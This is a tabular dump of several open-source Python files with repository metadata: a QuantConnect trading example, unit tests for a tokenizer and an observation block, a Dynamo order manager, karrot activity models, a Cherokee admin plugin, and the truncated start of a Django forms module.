code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.
# Lean Algorithmic Trading Engine v2.0. Copyright 2014 QuantConnect Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import clr
clr.AddReference("System")
clr.AddReference("QuantConnect.Algorithm")
clr.AddReference("QuantConnect.Common")
from System import *
from QuantConnect import *
from QuantConnect.Algorithm import *
from QuantConnect.Brokerages import *
class CustomBrokerageErrorHandlerAlgorithm(QCAlgorithm):
'''QCU How do I handle brokerage messages in a custom way?
Often you may want more stability and fault tolerance so you may want to control
what happens with brokerage messages. Using the custom messaging handler you
can ensure your algorithm continues operation through connection failures.'''
def Initialize(self):
'''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.'''
self.SetStartDate(2013,10,07) #Set Start Date
self.SetEndDate(2013,10,11) #Set End Date
self.SetCash(100000) #Set Strategy Cash
# Find more symbols here: http://quantconnect.com/data
self.AddSecurity(SecurityType.Equity, "SPY")
#Set the brokerage message handler:
self.SetBrokerageMessageHandler(CustomBrokerageMessageHandler(self))
def OnData(self, data):
'''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here.
Arguments:
data: Slice object keyed by symbol containing the stock data
'''
if self.Portfolio.HoldStock:
return
self.Order("SPY", 100)
self.Debug("Purchased SPY on {0}".format(self.Time.ToShortDateString()))
class CustomBrokerageMessageHandler(IBrokerageMessageHandler):
'''Handle the error messages in a custom manner'''
def __init__(self, algo):
self._algo = algo
def Handle(self, message):
'''Process the brokerage message event. Trigger any actions in the algorithm or notifications system required.
Arguments:
message: Message object
'''
toLog = "{0} Event: {1}".format(self._algo.Time.ToString("o"), message.Message)
self._algo.Debug(toLog)
self._algo.Log(toLog)
|
devalkeralia/Lean
|
Algorithm.Python/CustomBrokerageErrorHandlerAlgorithm.py
|
Python
|
apache-2.0
| 2,901
|
import datetime
from ecl.util.util import BoolVector
from ecl.util.test import TestAreaContext
from tests import ResTest
from res.enkf import ObsBlock
class ObsBlockTest(ResTest):
def test_create(self):
block = ObsBlock("OBS" , 1000)
self.assertTrue( isinstance( block , ObsBlock ))
self.assertEqual( 1000 , block.totalSize())
self.assertEqual( 0 , block.activeSize())
def test_access(self):
obs_size = 10
block = ObsBlock("OBS" , obs_size)
with self.assertRaises(IndexError):
block[100] = (1,1)
with self.assertRaises(IndexError):
block[-100] = (1,1)
with self.assertRaises(TypeError):
block[4] = 10
with self.assertRaises(TypeError):
block[4] = (1,1,9)
#------
with self.assertRaises(IndexError):
v = block[100]
with self.assertRaises(IndexError):
v = block[-100]
block[0] = (10,1)
v = block[0]
self.assertEqual( v , (10,1))
self.assertEqual( 1 , block.activeSize())
block[-1] = (17,19)
self.assertEqual( block[-1], (17,19))
|
andreabrambilla/libres
|
python/tests/res/enkf/test_obs_block.py
|
Python
|
gpl-3.0
| 1,177
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Test case for pyparser."""
from __future__ import division, print_function
import os
import re
import textwrap
import tokenize
from future.builtins import open
import pyparser
def _make_tuple(op):
return lambda x: (op, x)
NL = tokenize.NL
NEWLINE = tokenize.NEWLINE
NAME = _make_tuple(tokenize.NAME)
OP = _make_tuple(tokenize.OP)
INDENT = tokenize.INDENT
DEDENT = tokenize.DEDENT
COMMENT = tokenize.COMMENT
STRING = tokenize.STRING
NUMBER = tokenize.NUMBER
END = tokenize.ENDMARKER
token_names = {NL: "NL", NEWLINE: "NEWLINE", INDENT: "INDENT", COMMENT: "COMMENT", DEDENT: "DEDENT",
STRING: "STRING", NUMBER: "NUMBER", END: "END", tokenize.OP: "OP", tokenize.NAME: "NAME"}
Ws = pyparser.Whitespace
Comment = pyparser.Comment
Comment_banner = (pyparser.Comment, "banner")
Comment_code = (pyparser.Comment, "code")
Docstring = pyparser.Docstring
Import_future = (pyparser.ImportBlock, "future")
Import_stdlib = (pyparser.ImportBlock, "stdlib")
Import_3rdpty = (pyparser.ImportBlock, "third-party")
Import_1stpty = (pyparser.ImportBlock, "first-party")
Expression = pyparser.Expression
Function = (pyparser.Callable, "def")
Class = (pyparser.Callable, "class")
def assert_same_code(code1, code2):
"""Verify whether 2 code fragments are identical, and if not print an error message."""
regex = re.compile(r"\s+\\$", re.M)
code1 = re.sub(regex, r"\\", code1)
code2 = re.sub(regex, r"\\", code2)
if code2 != code1:
print()
lines_code1 = code1.splitlines()
lines_code2 = code2.splitlines()
n_diffs = 0
for i in range(len(lines_code1)):
old_line = lines_code1[i]
new_line = lines_code2[i] if i < len(lines_code2) else ""
if old_line != new_line:
print("%3d - %s" % (i + 1, old_line))
print("%3d + %s" % (i + 1, new_line))
n_diffs += 1
if n_diffs == 5: break
raise AssertionError("Unparsed code1 does not match the original.")
def test_tokenization():
"""
Test function for ``pyparser._normalize_tokens()``.
Even though this function is private, it is extremely important to verify that it behaves correctly. In
particular, we want to check that it does not break the round-trip guarantee of the tokenizer, and that it
fixes all the problems that the original tokenizer has.
"""
# Helper functions
def _parse_to_tokens(text):
"""Parse text into tokens and then normalize them."""
gen = iter(text.splitlines(True)) # True = keep newlines
readline = gen.next if hasattr(gen, "next") else gen.__next__
return pyparser._tokenize(readline)
def _unparse_tokens(tokens):
"""Convert tokens back into the source code."""
return tokenize.untokenize(t.token for t in tokens)
def _assert_tokens(tokens, target):
"""Check that the tokens list corresponds to the target provided."""
for i in range(len(tokens)):
assert i < len(target), "Token %d %r not expected" % (i, tokens[i])
tok = tokens[i]
trg = target[i]
valid = False
if isinstance(trg, int):
if tok.op == trg: valid = True
name = token_names[trg]
elif isinstance(trg, tuple) and len(trg) == 2:
if tok.op == trg[0] and tok.str == trg[1]: valid = True
name = "%s(%s)" % (token_names[trg[0]], trg[1])
else:
assert False, "Unknown target: %r" % trg
if not valid:
assert False, "Mismatched token %d: found %r, should be %r" % (i, tok, name)
assert len(target) == len(tokens), "Expected too many tokens: %d vs %d" % (len(tokens), len(target))
def check_code(code, expected_tokens=None, filename=None):
"""Test parsing of the given piece of code."""
code = textwrap.dedent(code)
if filename:
print("Testing tokenization of %s:" % filename, end=" ")
else:
check_code.index = getattr(check_code, "index", 0) + 1
print("Testing tokenization %d:" % check_code.index, end=" ")
tokens = _parse_to_tokens(code)
try:
try:
unparsed = _unparse_tokens(tokens)
except ValueError as e:
raise AssertionError("Cannot unparse tokens: %s" % e)
assert_same_code(code, unparsed)
if expected_tokens:
_assert_tokens(tokens, expected_tokens)
print("ok")
except AssertionError as e:
print(u"Error: %s" % e)
print(u"Original code fragment:\n" + code)
print("Tokens:")
for i, tok in enumerate(tokens):
print("%3d %r" % (i, tok))
raise
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, COMMENT, NL, DEDENT, DEDENT, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, DEDENT, COMMENT, NL, DEDENT, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, DEDENT, DEDENT, COMMENT, NL, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
def func():
# function
pass
""", [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def func(): # function
# hanging comment
pass
""", [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), COMMENT, NEWLINE, INDENT, COMMENT, NL,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def foo():
pass
#comment
def bar():
pass
""", [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
DEDENT, NL, COMMENT, NL, NAME("def"), NAME("bar"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def hello():
print("hello")
""", [NL, NAME("def"), NAME("hello"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NL, NL,
NAME("print"), OP("("), STRING, OP(")"), NEWLINE, DEDENT, END])
check_code("""
class Foo:
def foo(self):
pass
def bar(self):
return
""", [NL, NAME("class"), NAME("Foo"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("foo"), OP("("),
NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, NL, NAME("def"),
NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("return"), NEWLINE, DEDENT,
DEDENT, END])
check_code("""
def foo():
# Attempt to create the output directory
try:
os.makedirs(destdir)
except OSError as e:
raise
""", [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("try"),
OP(":"), NEWLINE, INDENT, NAME("os"), OP("."), NAME("makedirs"), OP("("), NAME("destdir"), OP(")"),
NEWLINE, DEDENT, NAME("except"), NAME("OSError"), NAME("as"), NAME("e"), OP(":"), NEWLINE, INDENT,
NAME("raise"), NEWLINE, DEDENT, DEDENT, END])
check_code("""
if PY2:
def unicode():
raise RuntimeError # disable this builtin function
# because it doesn't exist in Py3
handler = lambda: None # noop
# (will redefine later)
################################################################################
# comment 1
print("I'm done.")
""", [NL, NAME("if"), NAME("PY2"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("unicode"), OP("("), OP(")"),
OP(":"), NEWLINE, INDENT, NAME("raise"), NAME("RuntimeError"), COMMENT, NEWLINE, COMMENT, NL,
DEDENT, DEDENT, NL, NAME("handler"), OP("="), NAME("lambda"), OP(":"), NAME("None"), COMMENT, NEWLINE,
COMMENT, NL, NL, COMMENT, NL, NL, COMMENT, NL, NAME("print"), OP("("), STRING, OP(")"), NEWLINE, END])
check_code("""
def test3():
x = 1
# bad
print(x)
""", [NL, NAME("def"), NAME("test3"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("x"), OP("="),
NUMBER, NEWLINE, COMMENT, NL, NAME("print"), OP("("), NAME("x"), OP(")"), NEWLINE, DEDENT, END])
check_code("""
class Foo(object):
#-------------
def bar(self):
if True:
pass
# Originally the DEDENTs are all the way down near the decorator. Here we're testing how they'd travel
# all the way up across multiple comments.
# comment 3
# commmmmmmment 4
@decorator
""", [NL, NAME("class"), NAME("Foo"), OP("("), NAME("object"), OP(")"), OP(":"), NEWLINE, INDENT,
COMMENT, NL, NAME("def"), NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT,
NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
DEDENT, DEDENT, DEDENT, NL, COMMENT, NL, COMMENT, NL, NL, COMMENT, NL, NL, COMMENT,
NL, OP("@"), NAME("decorator"), NEWLINE, END])
# Really, one should avoid code like this.... It won't break the normalizer, but may create problems down
# the stream.
check_code("""
if True:
if False:
# INDENT will be inserted before this comment
raise
# DEDENT will be after this comment
else:
praise()
""", [NL, NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("if"), NAME("False"), OP(":"), NEWLINE,
INDENT, COMMENT, NL, NAME("raise"), NEWLINE, COMMENT, NL, DEDENT, NAME("else"), OP(":"), NEWLINE,
INDENT, NAME("praise"), OP("("), OP(")"), NEWLINE, DEDENT, DEDENT, END])
for directory in [".", "../../h2o-py/h2o", "../../h2o-py/tests"]:
absdir = os.path.abspath(directory)
for dir_name, subdirs, files in os.walk(absdir):
for f in files:
if f.endswith(".py"):
filename = os.path.join(dir_name, f)
with open(filename, "rt", encoding="utf-8") as fff:
check_code(fff.read(), filename=filename)
def test_pyparser():
"""Test case: general parsing."""
def _check_blocks(actual, expected):
assert actual, "No parse results"
for i in range(len(actual)):
assert i < len(expected), "Unexpected block %d:\n%r" % (i, actual[i])
valid = False
if isinstance(expected[i], type):
if isinstance(actual[i], expected[i]): valid = True
elif isinstance(expected[i], tuple):
if isinstance(actual[i], expected[i][0]) and actual[i].type == expected[i][1]: valid = True
if not valid:
assert False, "Invalid block: expected %r, got %r" % (expected[i], actual[i])
def check_code(code, blocks=None, filename=None):
code = textwrap.dedent(code)
if not code.endswith("\n"): code += "\n"
if filename:
print("Testing file %s..." % filename, end=" ")
else:
check_code.index = getattr(check_code, "index", 0) + 1
print("Testing code fragment %d..." % check_code.index, end=" ")
preparsed = None
parsed = None
unparsed = None
try:
preparsed = pyparser.parse_text(code)
parsed = preparsed.parse(2)
try:
unparsed = parsed.unparse()
except ValueError as e:
for i, tok in enumerate(parsed.tokens):
print("%3d %r" % (i, tok))
raise AssertionError("Cannot unparse code: %s" % e)
assert_same_code(code, unparsed)
if blocks:
_check_blocks(parsed.parsed, blocks)
print("ok")
except AssertionError as e:
print()
print(u"Error: " + str(e))
print(u"Original code fragment:\n" + code)
if unparsed: print(u"Unparsed code:\n" + unparsed)
if parsed:
print(parsed)
for i, tok in enumerate(parsed.tokens):
print("%3d %r" % (i, tok))
raise
except Exception as e:
print()
print(u"Error: " + str(e))
if preparsed:
print("Preparsed tokens:")
for i, tok in enumerate(preparsed.tokens):
print("%4d %r" % (i, tok))
else:
print("Initial parsing has failed...")
raise
check_code("""
# -*- encoding: utf-8 -*-
# copyright: 2016 h2o.ai
\"\"\"
A code example.
It's not supposed to be functional, or even functionable.
\"\"\"
from __future__ import braces, antigravity
# Standard library imports
import sys
import time
import this
import h2o
from h2o import H2OFrame, init
from . import *
# Do some initalization for legacy python versions
if PY2:
def unicode():
raise RuntimeError # disable this builtin function
# because it doesn't exist in Py3
handler = lambda: None # noop
# (will redefine later)
################################################################################
# comment 1
class Foo(object):
#------ Public -------------------------------------------------------------
def bar(self):
pass
# def foo():
# print(1)
#
# print(2)
# comment 2
@decorated(
1, 2, (3))
@dddd
def bar():
# be
# happy
print("bar!")
# bye""", [Ws, Comment, Docstring, Import_future, Ws, Import_stdlib, Ws, Import_1stpty, Ws, Expression,
Ws, Expression, Ws, Comment_banner, Ws, Class, Ws, Comment_code, Ws, Function, Comment, Ws])
for directory in [".", "../../h2o-py", "../../py"]:
absdir = os.path.abspath(directory)
for dir_name, subdirs, files in os.walk(absdir):
for f in files:
if f.endswith(".py"):
filename = os.path.join(dir_name, f)
with open(filename, "rt", encoding="utf-8") as fff:
check_code(fff.read(), filename=filename)
# test_tokenization()
test_pyparser()
|
h2oai/h2o-3
|
h2o-bindings/bin/pyunit_parser_test.py
|
Python
|
apache-2.0
| 15,752
|
from pyston.order.sorters import BaseSorter
from pyston.order.managers import BaseParserModelOrderManager
from pyston.order.utils import DIRECTION
class DynamoSorter(BaseSorter):
def get_order_term(self):
return self.direction == DIRECTION.ASC
class DynamoOrderManager(BaseParserModelOrderManager):
def _sort_queryset(self, qs, terms):
for term in terms:
qs = qs.set_scan_index_forward(term)
return qs
def _get_sorter_from_model(self, identifiers_prefix, identifiers, direction, model, resource, request,
order_fields_rfs):
if len(identifiers) == 1:
current_identifier = self._get_real_field_name(resource, identifiers[0])
if current_identifier == resource.get_range_key():
return DynamoSorter(identifiers_prefix + identifiers, direction)
return None
|
druids/django-pyston
|
pyston/contrib/dynamo/order.py
|
Python
|
bsd-3-clause
| 893
|
from datetime import timedelta
import pytz
from dateutil.relativedelta import relativedelta
from dateutil.rrule import rrulestr
from django.conf import settings
from django.core.validators import MinValueValidator, MaxValueValidator
from django.utils.translation import gettext as _
from django.db import models
from django.db import transaction
from django.db.models import Count, DurationField, F, Q, Sum
from django.utils import timezone
from karrot.base.base_models import BaseModel, CustomDateTimeTZRange, CustomDateTimeRangeField, UpdatedAtMixin
from karrot.conversations.models import ConversationMixin
from karrot.history.models import History, HistoryTypus
from karrot.activities import stats
from karrot.activities.utils import match_activities_with_dates, rrule_between_dates_in_local_time
from karrot.places.models import PlaceStatus
class ActivityTypeStatus(models.TextChoices):
ACTIVE = 'active'
ARCHIVED = 'archived'
class ActivityType(BaseModel, UpdatedAtMixin):
group = models.ForeignKey('groups.Group', on_delete=models.CASCADE, related_name='activity_types')
name = models.CharField(max_length=80)
name_is_translatable = models.BooleanField(default=True)
colour = models.CharField(max_length=6)
icon = models.CharField(max_length=100)
feedback_icon = models.CharField(max_length=100)
has_feedback = models.BooleanField(default=True)
has_feedback_weight = models.BooleanField(default=True)
status = models.CharField(
default=ActivityTypeStatus.ACTIVE.value,
choices=ActivityTypeStatus.choices,
max_length=100,
)
class Meta:
unique_together = ('group', 'name')
def get_translated_name(self):
# the translations are collected via activity_types.py
return _(self.name) if self.name_is_translatable else self.name
class ActivitySeriesQuerySet(models.QuerySet):
@transaction.atomic
def update_activities(self):
for series in self.filter(activity_type__status=ActivityTypeStatus.ACTIVE.value,
place__status=PlaceStatus.ACTIVE.value):
series.update_activities()
def annotate_timezone(self):
return self.annotate(timezone=F('place__group__timezone'))
class ActivitySeriesManager(models.Manager.from_queryset(ActivitySeriesQuerySet)):
def get_queryset(self):
return super().get_queryset().annotate_timezone()
class ActivitySeries(BaseModel):
objects = ActivitySeriesManager()
place = models.ForeignKey('places.Place', related_name='series', on_delete=models.CASCADE)
max_participants = models.PositiveIntegerField(blank=True, null=True)
rule = models.TextField()
start_date = models.DateTimeField()
description = models.TextField(blank=True)
duration = DurationField(null=True)
activity_type = models.ForeignKey(
ActivityType,
related_name='activity_series',
on_delete=models.CASCADE,
)
last_changed_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.SET_NULL,
related_name='changed_series',
null=True,
)
def create_activity(self, date):
return self.activities.create(
activity_type=self.activity_type,
date=CustomDateTimeTZRange(date, date + (self.duration or default_duration)),
has_duration=self.duration is not None,
max_participants=self.max_participants,
series=self,
place=self.place,
description=self.description,
last_changed_by=self.last_changed_by,
)
def period_start(self):
# shift start time slightly into future to avoid activities which are only valid for very short time
return timezone.now() + relativedelta(minutes=5)
def dates(self):
return rrule_between_dates_in_local_time(
rule=self.rule,
dtstart=self.start_date,
tz=self.get_timezone(),
period_start=self.period_start(),
period_duration=relativedelta(weeks=self.place.weeks_in_advance)
)
def get_timezone(self):
value = self.timezone if hasattr(self, 'timezone') else self.place.group.timezone
return pytz.timezone(value) if isinstance(value, str) else value
def get_matched_activities(self):
return match_activities_with_dates(
activities=self.activities.order_by('date').filter(date__startswith__gt=self.period_start()),
new_dates=self.dates(),
)
def update_activities(self):
"""
create new activities and delete empty activities that don't match series
"""
for activity, date in self.get_matched_activities():
if not activity:
self.create_activity(date)
elif not date:
if activity.participants.count() < 1:
activity.delete()
def __str__(self):
return 'ActivitySeries {} - {}'.format(self.rule, self.place)
def save(self, *args, **kwargs):
old = type(self).objects.get(pk=self.pk) if self.pk else None
super().save(*args, **kwargs)
if not old or old.start_date != self.start_date or old.rule != self.rule:
self.update_activities()
if old:
description_changed = old.description != self.description
max_participants_changed = old.max_participants != self.max_participants
duration_changed = old.duration != self.duration
if description_changed or max_participants_changed or duration_changed:
for activity in self.activities.upcoming():
if description_changed and old.description == activity.description:
activity.description = self.description
if max_participants_changed and old.max_participants == activity.max_participants:
activity.max_participants = self.max_participants
if duration_changed:
if self.duration:
activity.has_duration = True
activity.date = CustomDateTimeTZRange(
activity.date.start, activity.date.start + self.duration
)
else:
activity.has_duration = False
activity.date = CustomDateTimeTZRange(
activity.date.start, activity.date.start + default_duration
)
activity.save()
def delete(self, **kwargs):
self.rule = str(rrulestr(self.rule).replace(dtstart=self.start_date, until=timezone.now()))
self.update_activities()
return super().delete()
class ActivityQuerySet(models.QuerySet):
def _feedback_possible_q(self, user):
return Q(is_done=True) \
& Q(activity_type__has_feedback=True) \
& Q(date__endswith__gte=timezone.now() - relativedelta(days=settings.FEEDBACK_POSSIBLE_DAYS)) \
& Q(participants=user) \
& ~Q(feedback__given_by=user) \
& Q(activityparticipant__feedback_dismissed=False)
def only_feedback_possible(self, user):
return self.filter(self._feedback_possible_q(user))
def exclude_feedback_possible(self, user):
return self.filter(~self._feedback_possible_q(user))
def annotate_num_participants(self):
return self.annotate(num_participants=Count('participants'))
def annotate_timezone(self):
return self.annotate(timezone=F('place__group__timezone'))
def annotate_feedback_weight(self):
return self.annotate(feedback_weight=Sum('feedback__weight'))
def exclude_disabled(self):
return self.filter(is_disabled=False)
def in_group(self, group):
return self.filter(place__group=group)
def due_soon(self):
in_some_hours = timezone.now() + relativedelta(hours=settings.ACTIVITY_DUE_SOON_HOURS)
return self.exclude_disabled().filter(date__startswith__gt=timezone.now(), date__startswith__lt=in_some_hours)
def missed(self):
return self.exclude_disabled().filter(date__startswith__lt=timezone.now(), participants=None)
def done(self):
return self.exclude_disabled().filter(date__startswith__lt=timezone.now())\
.annotate_num_participants().filter(num_participants__gt=0)
def done_not_full(self):
return self.exclude_disabled() \
.annotate(participant_count=Count('participants')) \
.filter(date__startswith__lt=timezone.now(), participant_count__lt=F('max_participants'))
def upcoming(self):
return self.filter(date__startswith__gt=timezone.now())
@transaction.atomic
def process_finished_activities(self):
"""
find all activities that are in the past and didn't get processed yet
add them to history and mark as processed
"""
for activity in self.exclude_disabled().filter(
is_done=False,
date__startswith__lt=timezone.now(),
):
if not activity.place.is_active():
# Make sure we don't process this activity again, even if the place gets active in future
activity.is_disabled = True
activity.save()
continue
payload = {}
payload['activity_date'] = activity.id
if activity.series:
payload['series'] = activity.series.id
if activity.max_participants:
payload['max_participants'] = activity.max_participants
if activity.participants.count() == 0:
stats.activity_missed(activity)
History.objects.create(
typus=HistoryTypus.ACTIVITY_MISSED,
group=activity.place.group,
place=activity.place,
activity=activity,
date=activity.date.start,
payload=payload,
)
else:
stats.activity_done(activity)
History.objects.create(
typus=HistoryTypus.ACTIVITY_DONE,
group=activity.place.group,
place=activity.place,
activity=activity,
users=activity.participants.all(),
date=activity.date.start,
payload=payload,
)
activity.is_done = True
activity.save()
class ActivityManager(models.Manager.from_queryset(ActivityQuerySet)):
def get_queryset(self):
return super().get_queryset().annotate_timezone()
default_duration = timedelta(minutes=30)
def default_activity_date_range():
return CustomDateTimeTZRange(timezone.now(), timezone.now() + default_duration)
def to_range(date, **kwargs):
duration = timedelta(**kwargs) if kwargs else default_duration
return CustomDateTimeTZRange(date, date + duration)
class Activity(BaseModel, ConversationMixin):
objects = ActivityManager()
class Meta:
ordering = ['date']
activity_type = models.ForeignKey(
ActivityType,
related_name='activities',
on_delete=models.CASCADE,
)
series = models.ForeignKey(
'ActivitySeries',
related_name='activities',
on_delete=models.SET_NULL,
null=True,
)
place = models.ForeignKey(
'places.Place',
related_name='activities',
on_delete=models.CASCADE,
)
participants = models.ManyToManyField(
settings.AUTH_USER_MODEL,
related_name='activities',
through='ActivityParticipant',
through_fields=('activity', 'user')
)
feedback_given_by = models.ManyToManyField(
settings.AUTH_USER_MODEL,
related_name='feedback_about_activities',
through='Feedback',
through_fields=('about', 'given_by')
)
date = CustomDateTimeRangeField(default=default_activity_date_range)
has_duration = models.BooleanField(default=False)
description = models.TextField(blank=True)
max_participants = models.PositiveIntegerField(null=True)
is_disabled = models.BooleanField(default=False)
last_changed_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
null=True,
related_name='activities_changed',
on_delete=models.SET_NULL,
)
is_done = models.BooleanField(default=False)
@property
def group(self):
return self.place.group
@property
def ended_at(self):
if self.is_not_past():
return None
return self.date.end
def __str__(self):
return 'Activity {} - {}'.format(self.date.start, self.place)
def get_timezone(self):
value = self.timezone if hasattr(self, 'timezone') else self.group.timezone
return pytz.timezone(value) if isinstance(value, str) else value
def feedback_due(self):
if not self.activity_type.has_feedback:
return None
due = self.date.end + relativedelta(days=settings.FEEDBACK_POSSIBLE_DAYS)
return due.astimezone(self.get_timezone())
def is_upcoming(self):
return self.date.start > timezone.now()
def is_past(self):
return self.date.end < timezone.now()
def is_not_past(self):
return not self.is_past()
def is_full(self):
if not self.max_participants:
return False
return self.participants.count() >= self.max_participants
def is_participant(self, user):
return self.participants.filter(id=user.id).exists()
def is_empty(self):
return self.participants.count() == 0
def is_recent(self):
return self.date.start >= timezone.now() - relativedelta(days=settings.FEEDBACK_POSSIBLE_DAYS)
def empty_participants_count(self):
return max(0, self.max_participants - self.participants.count())
def add_participant(self, user):
participant, _ = ActivityParticipant.objects.get_or_create(
activity=self,
user=user,
)
return participant
def remove_participant(self, user):
ActivityParticipant.objects.filter(
activity=self,
user=user,
).delete()
def dismiss_feedback(self, user):
activity_participant = ActivityParticipant.objects.get(
activity=self,
user=user,
)
activity_participant.feedback_dismissed = True
activity_participant.save()
def save(self, *args, **kwargs):
if not self.has_duration:
# reset duration to default if activity has no explicit duration
start = self.date.start
self.date = CustomDateTimeTZRange(start, start + default_duration)
super().save(*args, **kwargs)
class ActivityParticipant(BaseModel):
activity = models.ForeignKey(
Activity,
on_delete=models.CASCADE,
)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
feedback_dismissed = models.BooleanField(default=False)
reminder_task_id = models.TextField(null=True) # stores a huey task id
class Meta:
db_table = 'activities_activity_participants'
unique_together = (('activity', 'user'), )
ordering = ['created_at']
class Feedback(BaseModel):
given_by = models.ForeignKey('users.User', on_delete=models.CASCADE, related_name='feedback')
about = models.ForeignKey('Activity', on_delete=models.CASCADE)
weight = models.FloatField(
blank=True, null=True, validators=[MinValueValidator(-0.01),
MaxValueValidator(10000.0)]
)
comment = models.CharField(max_length=settings.DESCRIPTION_MAX_LENGTH, blank=True)
# just to store legacy values for when feedback_as_sum was False on activities... null otherwise
# I guess can remove it after a while...
weight_for_average = models.FloatField(null=True)
class Meta:
unique_together = ('about', 'given_by')
|
yunity/foodsaving-backend
|
karrot/activities/models.py
|
Python
|
agpl-3.0
| 16,263
|
# -*- coding: utf-8 -*-
#
# Cheroke-admin
#
# Authors:
# Alvaro Lopez Ortega <alvaro@alobbs.com>
#
# Copyright (C) 2001-2014 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
import CTK
URL_APPLY = '/plugin/rehost/apply'
NOTE_REHOST = N_("Regular Expression against which the hosts be Host name will be compared.")
WARNING_EMPTY = N_("At least one Regular Expression string must be defined.")
class Content (CTK.Container):
def __init__ (self, refreshable, key, url_apply, **kwargs):
CTK.Container.__init__ (self, **kwargs)
entries = CTK.cfg.keys (key)
# Warning message
if not entries:
notice = CTK.Notice('warning')
notice += CTK.RawHTML (_(WARNING_EMPTY))
self += notice
# List
else:
table = CTK.Table()
submit = CTK.Submitter(url_apply)
submit += table
self += CTK.Indenter(submit)
table.set_header(1)
table += [CTK.RawHTML(_('Regular Expressions'))]
for i in entries:
e1 = CTK.TextCfg ("%s!%s"%(key,i))
rm = None
if len(entries) >= 2:
rm = CTK.ImageStock('del')
rm.bind('click', CTK.JS.Ajax (url_apply,
data = {"%s!%s"%(key,i): ''},
complete = refreshable.JS_to_refresh()))
table += [e1, rm]
# Add New
table = CTK.PropsTable()
next = CTK.cfg.get_next_entry_prefix (key)
table.Add (_('New Regular Expression'), CTK.TextCfg(next, False, {'class':'noauto'}), _(NOTE_REHOST))
submit = CTK.Submitter(url_apply)
dialog = CTK.Dialog2Buttons ({'title': _('Add New Entry')}, _('Add'), submit.JS_to_submit())
submit += table
submit.bind ('submit_success', refreshable.JS_to_refresh())
submit.bind ('submit_success', dialog.JS_to_close())
dialog += submit
self += dialog
add_new = CTK.Button(_('Add new entry…'))
add_new.bind ('click', dialog.JS_to_show())
self += add_new
class Plugin_rehost (CTK.Plugin):
def __init__ (self, key, vsrv_num):
CTK.Plugin.__init__ (self, key)
pre = '%s!regex' %(key)
url_apply = '%s/%s' %(URL_APPLY, vsrv_num)
self += CTK.RawHTML ("<h2>%s</h2>" % (_('New Regular Expression')))
# Content
refresh = CTK.Refreshable ({'id': 'plugin_rehost'})
refresh.register (lambda: Content(refresh, pre, url_apply).Render())
self += refresh
# Validation, and Public URLs
CTK.publish ('^%s/[\d]+'%(URL_APPLY), CTK.cfg_apply_post, method="POST")
|
cherokee/webserver
|
admin/plugins/rehost.py
|
Python
|
gpl-2.0
| 3,388
|
# -*- coding: utf-8 -*-
"""Formulaires de l'application."""
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from .models import Station
from .models import Passenger
from django.core.exceptions import ValidationError
def validate_station(value):
if not value or not Station.objects.filter(name=value).exists():
raise ValidationError("La gare de %(value)s n'existe pas.",
code='notfound', params={'value': value})
class SearchForm(forms.Form):
"""Formulaire de recherche de trajets."""
